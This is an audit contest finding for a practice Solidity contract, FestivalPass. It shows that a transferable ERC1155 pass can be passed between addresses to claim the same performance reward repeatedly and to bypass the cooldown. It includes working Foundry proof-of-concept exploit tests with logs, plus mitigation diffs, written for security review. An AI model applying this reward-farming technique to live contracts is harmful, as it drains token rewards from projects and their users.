Beatland Festival

AI First Flight #4

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Transferable pass can be reused to claim the same performance reward multiple times

may47n

Scope

FestivalPass.sol
buyPass(uint256 collectionId)
attendPerformance(uint256 performanceId)
inherited ERC1155 transfer flow used after pass purchase

Root + Impact

Description

The normal behavior is that one festival pass should represent one attendee entitlement for a given performance reward flow. A user buys a pass, attends a performance once, receives the corresponding BEAT reward, and then uses earned BEAT to redeem memorabilia.

The issue is that attendance is tracked only per performanceId and per caller address, while the pass itself remains freely transferable as an ERC1155 token. Because of that, the same pass can be transferred across multiple attacker-controlled addresses during one active performance, and each fresh holder can claim the same performance reward again.

This turns one purchased pass into multiple reward entitlements and allows unauthorized BEAT inflation, which can then be converted into additional memorabilia redemptions.

mapping(uint256 => mapping(address => bool)) public hasAttended;

mapping(address => uint256) public lastCheckIn;

function buyPass(uint256 collectionId) external payable {

require(collectionId == GENERAL_PASS || collectionId == VIP_PASS || collectionId == BACKSTAGE_PASS, "Invalid pass ID");

require(msg.value == passPrice[collectionId], "Incorrect payment amount");

require(passSupply[collectionId] < passMaxSupply[collectionId], "Max supply reached");

@> _mint(msg.sender, collectionId, 1, "");

++passSupply[collectionId];

}

function attendPerformance(uint256 performanceId) external {

require(isPerformanceActive(performanceId), "Performance is not active");

@> require(hasPass(msg.sender), "Must own a pass");

@> require(!hasAttended[performanceId][msg.sender], "Already attended this performance");

@> require(block.timestamp >= lastCheckIn[msg.sender] + COOLDOWN, "Cooldown period not met");

@> hasAttended[performanceId][msg.sender] = true;

@> lastCheckIn[msg.sender] = block.timestamp;

uint256 multiplier = getMultiplier(msg.sender);

@> BeatToken(beatToken).mint(msg.sender, performances[performanceId].baseReward * multiplier);

}

The root cause is that:

eligibility is checked against the current holder address;
duplicate protection is also stored against the current holder address;
cooldown is stored against the current holder address;
but the pass can be transferred to a new address that has a clean hasAttended slot and a clean lastCheckIn slot.

As a result, transferring the pass resets practical claimability for the same performance without requiring a second paid pass.

Risk

Likelihood:

The route is public and requires no owner or organizer privileges.
The exploit only needs one purchased pass and multiple attacker-controlled addresses.
The attack works during any active performance window because the pass remains transferable after purchase.
The duplicate-claim and cooldown protections are address-bound, so every fresh receiving address gets a clean claim state.

Impact:

One paid pass can mint multiple attendance rewards for the same performance.
BEAT supply can be inflated beyond intended performance accounting.
The attacker can use the excess BEAT to redeem more memorabilia NFTs than one legitimate pass should authorize.
The reward system is no longer bounded by sold pass count for a given performance.

Proof of Concept

// SPDX-License-Identifier: MIT

pragma solidity 0.8.25;

import {Test, console2} from "forge-std/Test.sol";

import {FestivalPass} from "../src/FestivalPass.sol";

import {BeatToken} from "../src/BeatToken.sol";

contract FestivalPassAuditTest is Test {

FestivalPass internal festivalPass;

BeatToken internal beatToken;

address internal organizer = makeAddr("organizer");

address internal attacker1 = makeAddr("attacker1");

address internal attacker2 = makeAddr("attacker2");

address internal attacker3 = makeAddr("attacker3");

uint256 internal constant GENERAL_PRICE = 0.05 ether;

function setUp() public {

beatToken = new BeatToken();

festivalPass = new FestivalPass(address(beatToken), organizer);

beatToken.setFestivalContract(address(festivalPass));

vm.prank(organizer);

festivalPass.configurePass(1, GENERAL_PRICE, 10);

vm.deal(attacker1, 1 ether);

}

function test_OnePassCanFarmMultipleAttendanceRewardsByTransfer() public {

vm.prank(attacker1);

festivalPass.buyPass{value: GENERAL_PRICE}(1);

vm.prank(organizer);

uint256 performanceId = festivalPass.createPerformance(block.timestamp + 1 hours, 3 hours, 100e18);

vm.warp(block.timestamp + 90 minutes);

vm.prank(attacker1);

festivalPass.attendPerformance(performanceId);

vm.prank(attacker1);

festivalPass.safeTransferFrom(attacker1, attacker2, 1, 1, "");

vm.prank(attacker2);

festivalPass.attendPerformance(performanceId);

vm.prank(attacker2);

festivalPass.safeTransferFrom(attacker2, attacker3, 1, 1, "");

vm.prank(attacker3);

festivalPass.attendPerformance(performanceId);

console2.log("sold pass supply", festivalPass.passSupply(1));

console2.log("attacker1 BEAT", beatToken.balanceOf(attacker1));

console2.log("attacker2 BEAT", beatToken.balanceOf(attacker2));

console2.log("attacker3 BEAT", beatToken.balanceOf(attacker3));

console2.log("total BEAT minted from one pass / one performance", beatToken.totalSupply());

assertEq(beatToken.balanceOf(attacker1), 100e18);

assertEq(beatToken.balanceOf(attacker2), 100e18);

assertEq(beatToken.balanceOf(attacker3), 100e18);

assertEq(beatToken.totalSupply(), 300e18);

}

Observed result:

[PASS] test_OnePassCanFarmMultipleAttendanceRewardsByTransfer()

Logs:

sold pass supply 1

attacker1 BEAT 100000000000000000000

attacker2 BEAT 100000000000000000000

attacker3 BEAT 100000000000000000000

total BEAT minted from one pass / one performance 300000000000000000000

The PoC shows that only one pass was sold, but the same performance reward was successfully claimed three times by transferring the pass across attacker-controlled addresses.

Recommended Mitigation

The core fix is to bind attendance eligibility to a non-recyclable entitlement rather than the current wallet address. The simplest mitigation is to make festival passes non-transferable. If transfers must remain supported, then reward consumption must be tracked per pass entitlement rather than per address.

function attendPerformance(uint256 performanceId) external {

require(isPerformanceActive(performanceId), "Performance is not active");

require(hasPass(msg.sender), "Must own a pass");

- require(!hasAttended[performanceId][msg.sender], "Already attended this performance");

- require(block.timestamp >= lastCheckIn[msg.sender] + COOLDOWN, "Cooldown period not met");

+ require(!hasConsumedPassForPerformance[performanceId][passIdUsed], "Already attended this performance");

+ require(block.timestamp >= lastCheckInByPass[passIdUsed] + COOLDOWN, "Cooldown period not met");

- hasAttended[performanceId][msg.sender] = true;

- lastCheckIn[msg.sender] = block.timestamp;

+ hasConsumedPassForPerformance[performanceId][passIdUsed] = true;

+ lastCheckInByPass[passIdUsed] = block.timestamp;

}

+function _update(address from, address to, uint256[] memory ids, uint256[] memory values) internal override {

+ for (uint256 i; i < ids.length; ++i) {

+ require(ids[i] > BACKSTAGE_PASS, "Festival passes are non-transferable");

+ }

+ super._update(from, to, ids, values);

Any equivalent fix that prevents a transferred pass from regaining fresh attendance eligibility for the same performance would also resolve the issue.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Pass Lending Reward Multiplication Enables Unlimited Performance Rewards

# Root + Impact ## Description * The `attendPerformance()` function is designed to reward pass holders for attending performances, with VIP and BACKSTAGE passes receiving multiplied rewards based on their tier. Under normal operation, each pass should generate rewards for a single attendee per performance, maintaining balanced tokenomics where one pass purchase corresponds to one set of performance rewards throughout the festival. * However, the attendance system tracks attendance per user rather than per pass, while pass ownership validation occurs only at the moment of attendance through `hasPass()`. This allows coordinated users to share a single pass by strategically transferring it between attendees, enabling multiple users to attend the same performance with the same pass and each receive full multiplied rewards, effectively turning one pass purchase into unlimited reward generation. ```Solidity function attendPerformance(uint256 performanceId) external { require(isPerformanceActive(performanceId), "Performance is not active"); @> require(hasPass(msg.sender), "Must own a pass"); // Only checks current ownership @> require(!hasAttended[performanceId][msg.sender], "Already attended this performance"); // Per-user tracking require(block.timestamp >= lastCheckIn[msg.sender] + COOLDOWN, "Cooldown period not met"); @> hasAttended[performanceId][msg.sender] = true; // Marks user as attended lastCheckIn[msg.sender] = block.timestamp; uint256 multiplier = getMultiplier(msg.sender); BeatToken(beatToken).mint(msg.sender, performances[performanceId].baseReward * multiplier); } function hasPass(address user) public view returns (bool) { @> return balanceOf(user, GENERAL_PASS) > 0 || balanceOf(user, VIP_PASS) > 0 || balanceOf(user, BACKSTAGE_PASS) > 0; // Only checks current balance } ``` The vulnerability exists in the combination of per-user attendance tracking (`hasAttended[performanceId][msg.sender]`) and point-in-time pass ownership validation (`hasPass(msg.sender)`). The system records that a specific user attended a specific performance, but does not track which pass was used or prevent the same pass from being used by multiple users for the same performance through transfers. ## Risk **Likelihood**: * The vulnerability requires coordination between multiple users and strategic timing of pass transfers during active performance windows, which demands planning and cooperation rather than simple individual exploitation. * The attack becomes immediately executable once multiple users coordinate, as ERC1155 transfers are permissionless and the attendance system provides no restrictions on pass transfers between attendance events. **Impact**: * Unlimited reward farming from single pass purchases enables coordinated groups to multiply performance rewards indefinitely (demonstrated: 4x-10x reward multiplication), completely breaking the intended pass-to-reward ratio and causing massive BEAT token inflation. * Complete bypass of cooldown mechanisms and attendance restrictions through pass lending, allowing rapid reward extraction and undermining all intended rate-limiting protections designed to prevent reward farming abuse. ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity 0.8.25; import "forge-std/Test.sol"; import "../src/FestivalPass.sol"; import "../src/BeatToken.sol"; import {console} from "forge-std/console.sol"; /** * @title Pass Lending Reward Multiplication PoC * @dev Demonstrates how single pass can generate unlimited rewards across multiple users * through strategic pass transfers and coordinated attendance * * VULNERABILITY: No ownership tracking during attendance * - hasPass() only checks current balance at time of attendance * - attendPerformance() tracks attendance per user, not per pass * - Single pass can be transferred between users for unlimited reward farming * * ATTACK VECTOR: * 1. Alice buys 1 VIP pass and attends performance → earns 2x rewards * 2. Alice transfers pass to Bob * 3. Bob attends same performance → earns 2x rewards * 4. Bob transfers pass to Charlie → Charlie attends → repeat * 5. Single pass generates unlimited rewards across unlimited users */ contract PassLendingExploitPoC is Test { FestivalPass public festivalPass; BeatToken public beatToken; address public owner; address public organizer; address public alice; address public bob; address public charlie; address public dave; // Pass configuration for maximum reward exploitation uint256 constant VIP_PRICE = 0.1 ether; uint256 constant VIP_MAX_SUPPLY = 1000; uint256 constant VIP_PASS = 2; uint256 constant VIP_MULTIPLIER = 2; // 2x rewards uint256 public performanceId; uint256 constant BASE_REWARD = 100e18; uint256 constant EXPECTED_VIP_REWARD = BASE_REWARD * VIP_MULTIPLIER; // 200 BEAT function setUp() public { owner = makeAddr("owner"); organizer = makeAddr("organizer"); alice = makeAddr("alice"); bob = makeAddr("bob"); charlie = makeAddr("charlie"); dave = makeAddr("dave"); // Deploy protocol vm.startPrank(owner); beatToken = new BeatToken(); festivalPass = new FestivalPass(address(beatToken), organizer); beatToken.setFestivalContract(address(festivalPass)); vm.stopPrank(); // Configure VIP pass vm.prank(organizer); festivalPass.configurePass(VIP_PASS, VIP_PRICE, VIP_MAX_SUPPLY); // Create a performance for exploitation vm.prank(organizer); performanceId = festivalPass.createPerformance( block.timestamp + 1 hours, // starts in 1 hour 4 hours, // lasts 4 hours BASE_REWARD // base reward ); // Fund Alice to buy the pass vm.deal(alice, 1 ether); } function testSinglePassMultipleRewards() public { console.log("=== PASS LENDING REWARD MULTIPLICATION EXPLOIT ===\n"); // Alice buys single VIP pass console.log("--- Setup: Alice buys 1 VIP pass ---"); vm.prank(alice); festivalPass.buyPass{value: VIP_PRICE}(VIP_PASS); console.log("Alice VIP balance:", festivalPass.balanceOf(alice, VIP_PASS)); console.log("Alice BEAT balance (welcome bonus):", beatToken.balanceOf(alice)); // Warp to performance time vm.warp(block.timestamp + 2 hours); console.log("\n--- Performance starts, exploitation begins ---"); // STEP 1: Alice attends performance and earns rewards console.log("STEP 1: Alice attends performance"); vm.prank(alice); festivalPass.attendPerformance(performanceId); uint256 aliceReward = beatToken.balanceOf(alice) - 5e18; // subtract welcome bonus console.log("Alice attendance reward:", aliceReward); console.log("Alice has attended:", festivalPass.hasAttended(performanceId, alice)); // STEP 2: Alice transfers pass to Bob console.log("\nSTEP 2: Alice transfers VIP pass to Bob"); vm.prank(alice); festivalPass.safeTransferFrom(alice, bob, VIP_PASS, 1, ""); console.log("Alice VIP balance:", festivalPass.balanceOf(alice, VIP_PASS)); console.log("Bob VIP balance:", festivalPass.balanceOf(bob, VIP_PASS)); console.log("Bob has pass:", festivalPass.hasPass(bob)); // STEP 3: Bob attends SAME performance with transferred pass console.log("\nSTEP 3: Bob attends SAME performance with transferred pass"); vm.prank(bob); festivalPass.attendPerformance(performanceId); uint256 bobReward = beatToken.balanceOf(bob); console.log("Bob attendance reward:", bobReward); console.log("Bob has attended:", festivalPass.hasAttended(performanceId, bob)); // STEP 4: Bob transfers pass to Charlie console.log("\nSTEP 4: Bob transfers VIP pass to Charlie"); vm.prank(bob); festivalPass.safeTransferFrom(bob, charlie, VIP_PASS, 1, ""); // STEP 5: Charlie attends SAME performance console.log("\nSTEP 5: Charlie attends SAME performance"); vm.prank(charlie); festivalPass.attendPerformance(performanceId); uint256 charlieReward = beatToken.balanceOf(charlie); console.log("Charlie attendance reward:", charlieReward); // STEP 6: Charlie transfers to Dave for final demonstration console.log("\nSTEP 6: Charlie transfers to Dave"); vm.prank(charlie); festivalPass.safeTransferFrom(charlie, dave, VIP_PASS, 1, ""); vm.prank(dave); festivalPass.attendPerformance(performanceId); uint256 daveReward = beatToken.balanceOf(dave); console.log("Dave attendance reward:", daveReward); // Calculate total exploitation console.log("\n=== EXPLOITATION RESULTS ==="); uint256 totalRewards = aliceReward + bobReward + charlieReward + daveReward; uint256 legitimateReward = EXPECTED_VIP_REWARD; // Only 1 person should get rewards console.log("Total BEAT farmed from 1 pass:", totalRewards); console.log("Legitimate reward (1 person):", legitimateReward); console.log("Reward multiplication factor:", totalRewards / legitimateReward); console.log("Excess BEAT stolen:", totalRewards - legitimateReward); // Verify the exploit assertEq(aliceReward, EXPECTED_VIP_REWARD, "Alice should get VIP reward"); assertEq(bobReward, EXPECTED_VIP_REWARD, "Bob should get VIP reward"); assertEq(charlieReward, EXPECTED_VIP_REWARD, "Charlie should get VIP reward"); assertEq(daveReward, EXPECTED_VIP_REWARD, "Dave should get VIP reward"); assertEq(totalRewards, 4 * legitimateReward, "4x reward multiplication"); // Show that attendance tracking is per-user, not per-pass console.log("\nAttendance tracking per user:"); console.log("Alice attended:", festivalPass.hasAttended(performanceId, alice)); console.log("Bob attended:", festivalPass.hasAttended(performanceId, bob)); console.log("Charlie attended:", festivalPass.hasAttended(performanceId, charlie)); console.log("Dave attended:", festivalPass.hasAttended(performanceId, dave)); // Current pass holder console.log("Final pass holder (Dave):", festivalPass.balanceOf(dave, VIP_PASS)); } function testLargeScalePassLendingRing() public { console.log("=== LARGE-SCALE PASS LENDING RING ===\n"); // Alice buys single BACKSTAGE pass (highest multiplier) uint256 BACKSTAGE_PRICE = 0.25 ether; uint256 BACKSTAGE_PASS = 3; uint256 BACKSTAGE_MULTIPLIER = 3; vm.prank(organizer); festivalPass.configurePass(BACKSTAGE_PASS, BACKSTAGE_PRICE, 100); vm.deal(alice, 1 ether); vm.prank(alice); festivalPass.buyPass{value: BACKSTAGE_PRICE}(BACKSTAGE_PASS); // Create multiple performances for maximum exploitation vm.startPrank(organizer); uint256 perf1 = festivalPass.createPerformance(block.timestamp + 1 hours, 6 hours, BASE_REWARD); uint256 perf2 = festivalPass.createPerformance(block.timestamp + 2 hours, 6 hours, BASE_REWARD); vm.stopPrank(); // Create lending ring of 10 users address[] memory lendingRing = new address[](10); for (uint256 i = 0; i < 10; i++) { lendingRing[i] = makeAddr(string(abi.encodePacked("user", i))); } lendingRing[0] = alice; // Alice starts with the pass console.log("Lending ring size:", lendingRing.length); console.log("BACKSTAGE pass multiplier:", BACKSTAGE_MULTIPLIER); console.log("Expected reward per attendance:", BASE_REWARD * BACKSTAGE_MULTIPLIER); // Exploit Performance 1 vm.warp(block.timestamp + 90 minutes); console.log("\n--- Exploiting Performance 1 ---"); for (uint256 i = 0; i < lendingRing.length; i++) { address currentUser = lendingRing[i]; // User attends performance vm.prank(currentUser); festivalPass.attendPerformance(perf1); uint256 reward = beatToken.balanceOf(currentUser); if (i == 0) reward -= 15e18; // subtract Alice's welcome bonus console.log("User", i, "reward:", reward); // Transfer to next user (except last) if (i < lendingRing.length - 1) { address nextUser = lendingRing[i + 1]; vm.prank(currentUser); festivalPass.safeTransferFrom(currentUser, nextUser, BACKSTAGE_PASS, 1, ""); } } // Wait for cooldown and exploit Performance 2 vm.warp(block.timestamp + 2 hours); console.log("\n--- Exploiting Performance 2 ---"); // Start from last user who has the pass address currentHolder = lendingRing[lendingRing.length - 1]; for (uint256 i = 0; i < lendingRing.length; i++) { vm.prank(currentHolder); festivalPass.attendPerformance(perf2); // Transfer to next user for continued exploitation if (i < lendingRing.length - 1) { address nextUser = lendingRing[i]; vm.prank(currentHolder); festivalPass.safeTransferFrom(currentHolder, nextUser, BACKSTAGE_PASS, 1, ""); currentHolder = nextUser; } } // Calculate total damage console.log("\n=== LARGE-SCALE EXPLOITATION RESULTS ==="); uint256 totalBEATFarmed = 0; for (uint256 i = 0; i < lendingRing.length; i++) { uint256 userBalance = beatToken.balanceOf(lendingRing[i]); if (i == 0) userBalance -= 15e18; // subtract welcome bonus totalBEATFarmed += userBalance; console.log("User", i, "total BEAT:", userBalance); } uint256 legitimateTotal = 2 * BASE_REWARD * BACKSTAGE_MULTIPLIER; // 2 performances, 1 person console.log("Total BEAT farmed:", totalBEATFarmed); console.log("Legitimate total (2 performances, 1 person):", legitimateTotal); console.log("Exploitation multiplier:", totalBEATFarmed / legitimateTotal); assertGe(totalBEATFarmed, legitimateTotal * 10, "Should farm >=10x legitimate rewards"); } function testCooldownBypassThroughLending() public { console.log("=== COOLDOWN BYPASS THROUGH PASS LENDING ===\n"); // Alice buys VIP pass vm.prank(alice); festivalPass.buyPass{value: VIP_PRICE}(VIP_PASS); // Create overlapping performances to test cooldown bypass vm.startPrank(organizer); uint256 perf1 = festivalPass.createPerformance(block.timestamp + 1 hours, 3 hours, BASE_REWARD); uint256 perf2 = festivalPass.createPerformance(block.timestamp + 1 hours, 3 hours, BASE_REWARD); vm.stopPrank(); vm.warp(block.timestamp + 90 minutes); // Alice attends performance 1 console.log("Alice attends performance 1"); vm.prank(alice); festivalPass.attendPerformance(perf1); console.log("Alice lastCheckIn:", festivalPass.lastCheckIn(alice)); // Alice tries to attend performance 2 immediately (should fail due to cooldown) console.log("\nAlice tries performance 2 immediately:"); vm.prank(alice); vm.expectRevert("Cooldown period not met"); festivalPass.attendPerformance(perf2); console.log(" Cooldown protection working"); // Alice transfers pass to Bob to bypass cooldown console.log("\nAlice transfers pass to Bob to bypass cooldown"); vm.prank(alice); festivalPass.safeTransferFrom(alice, bob, VIP_PASS, 1, ""); // Bob can immediately attend performance 2 (no cooldown for Bob) console.log("Bob attends performance 2 immediately:"); vm.prank(bob); festivalPass.attendPerformance(perf2); uint256 bobReward = beatToken.balanceOf(bob); console.log("Bob reward:", bobReward); console.log("Bob lastCheckIn:", festivalPass.lastCheckIn(bob)); console.log("\n=== COOLDOWN BYPASS RESULTS ==="); console.log("Alice could not attend due to cooldown"); console.log("Bob successfully attended immediately after transfer"); console.log("Cooldown mechanism bypassed through pass lending"); assertEq(bobReward, EXPECTED_VIP_REWARD, "Bob should successfully earn rewards"); assertEq(festivalPass.lastCheckIn(bob), block.timestamp, "Bob's check-in should be recorded"); } } ``` ```Solidity forge test --match-contract PassLendingExploitPoC -vv [⠰] Compiling... [⠃] Compiling 1 files with Solc 0.8.25 [⠊] Solc 0.8.25 finished in 442.56ms Compiler run successful! Ran 3 tests for test/PassLendingExploit.t.sol:PassLendingExploitPoC [PASS] testCooldownBypassThroughLending() (gas: 473221) Logs: === COOLDOWN BYPASS THROUGH PASS LENDING === Alice attends performance 1 Alice lastCheckIn: 5401 Alice tries performance 2 immediately: Cooldown protection working Alice transfers pass to Bob to bypass cooldown Bob attends performance 2 immediately: Bob reward: 200000000000000000000 Bob lastCheckIn: 5401 === COOLDOWN BYPASS RESULTS === Alice could not attend due to cooldown Bob successfully attended immediately after transfer Cooldown mechanism bypassed through pass lending [PASS] testLargeScalePassLendingRing() (gas: 1794585) Logs: === LARGE-SCALE PASS LENDING RING === Lending ring size: 10 BACKSTAGE pass multiplier: 3 Expected reward per attendance: 300000000000000000000 --- Exploiting Performance 1 --- User 0 reward: 300000000000000000000 User 1 reward: 300000000000000000000 User 2 reward: 300000000000000000000 User 3 reward: 300000000000000000000 User 4 reward: 300000000000000000000 User 5 reward: 300000000000000000000 User 6 reward: 300000000000000000000 User 7 reward: 300000000000000000000 User 8 reward: 300000000000000000000 User 9 reward: 300000000000000000000 --- Exploiting Performance 2 --- === LARGE-SCALE EXPLOITATION RESULTS === User 0 total BEAT: 600000000000000000000 User 1 total BEAT: 600000000000000000000 User 2 total BEAT: 600000000000000000000 User 3 total BEAT: 600000000000000000000 User 4 total BEAT: 600000000000000000000 User 5 total BEAT: 600000000000000000000 User 6 total BEAT: 600000000000000000000 User 7 total BEAT: 600000000000000000000 User 8 total BEAT: 600000000000000000000 User 9 total BEAT: 600000000000000000000 Total BEAT farmed: 6000000000000000000000 Legitimate total (2 performances, 1 person): 600000000000000000000 Exploitation multiplier: 10 [PASS] testSinglePassMultipleRewards() (gas: 567999) Logs: === PASS LENDING REWARD MULTIPLICATION EXPLOIT === --- Setup: Alice buys 1 VIP pass --- Alice VIP balance: 1 Alice BEAT balance (welcome bonus): 5000000000000000000 --- Performance starts, exploitation begins --- STEP 1: Alice attends performance Alice attendance reward: 200000000000000000000 Alice has attended: true STEP 2: Alice transfers VIP pass to Bob Alice VIP balance: 0 Bob VIP balance: 1 Bob has pass: true STEP 3: Bob attends SAME performance with transferred pass Bob attendance reward: 200000000000000000000 Bob has attended: true STEP 4: Bob transfers VIP pass to Charlie STEP 5: Charlie attends SAME performance Charlie attendance reward: 200000000000000000000 STEP 6: Charlie transfers to Dave Dave attendance reward: 200000000000000000000 === EXPLOITATION RESULTS === Total BEAT farmed from 1 pass: 800000000000000000000 Legitimate reward (1 person): 200000000000000000000 Reward multiplication factor: 4 Excess BEAT stolen: 600000000000000000000 Attendance tracking per user: Alice attended: true Bob attended: true Charlie attended: true Dave attended: true Final pass holder (Dave): 1 Suite result: ok. 3 passed; 0 failed; 0 skipped; finished in 2.49ms (2.14ms CPU time) Ran 1 test suite in 4.56ms (2.49ms CPU time): 3 tests passed, 0 failed, 0 skipped (3 total tests) ``` ## Recommended Mitigation The fix implements per-pass attendance tracking to ensure each individual pass can only be used once per performance, regardless of how many times it's transferred between users. This preserves the intended 1-pass-1-reward economics while still allowing legitimate pass transfers for other purposes, preventing coordinated reward multiplication while maintaining the flexibility of the ERC1155 standard. ```diff contract FestivalPass is ERC1155, Ownable2Step, IFestivalPass { // ... existing state variables ... + mapping(uint256 => mapping(uint256 => bool)) public passUsedForPerformance; // performanceId => passTokenId => used function attendPerformance(uint256 performanceId) external { require(isPerformanceActive(performanceId), "Performance is not active"); require(hasPass(msg.sender), "Must own a pass"); require(!hasAttended[performanceId][msg.sender], "Already attended this performance"); require(block.timestamp >= lastCheckIn[msg.sender] + COOLDOWN, "Cooldown period not met"); + // Check which pass type the user owns and mark it as used + uint256 userPassId = getUserPassId(msg.sender); + require(!passUsedForPerformance[performanceId][userPassId], "This pass already used for this performance"); + passUsedForPerformance[performanceId][userPassId] = true; hasAttended[performanceId][msg.sender] = true; lastCheckIn[msg.sender] = block.timestamp; uint256 multiplier = getMultiplier(msg.sender); BeatToken(beatToken).mint(msg.sender, performances[performanceId].baseReward * multiplier); emit Attended(msg.sender, performanceId, performances[performanceId].baseReward * multiplier); } + function getUserPassId(address user) internal view returns (uint256) { + if (balanceOf(user, BACKSTAGE_PASS) > 0) return BACKSTAGE_PASS; + if (balanceOf(user, VIP_PASS) > 0) return VIP_PASS; + if (balanceOf(user, GENERAL_PASS) > 0) return GENERAL_PASS; + revert("User has no pass"); + } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!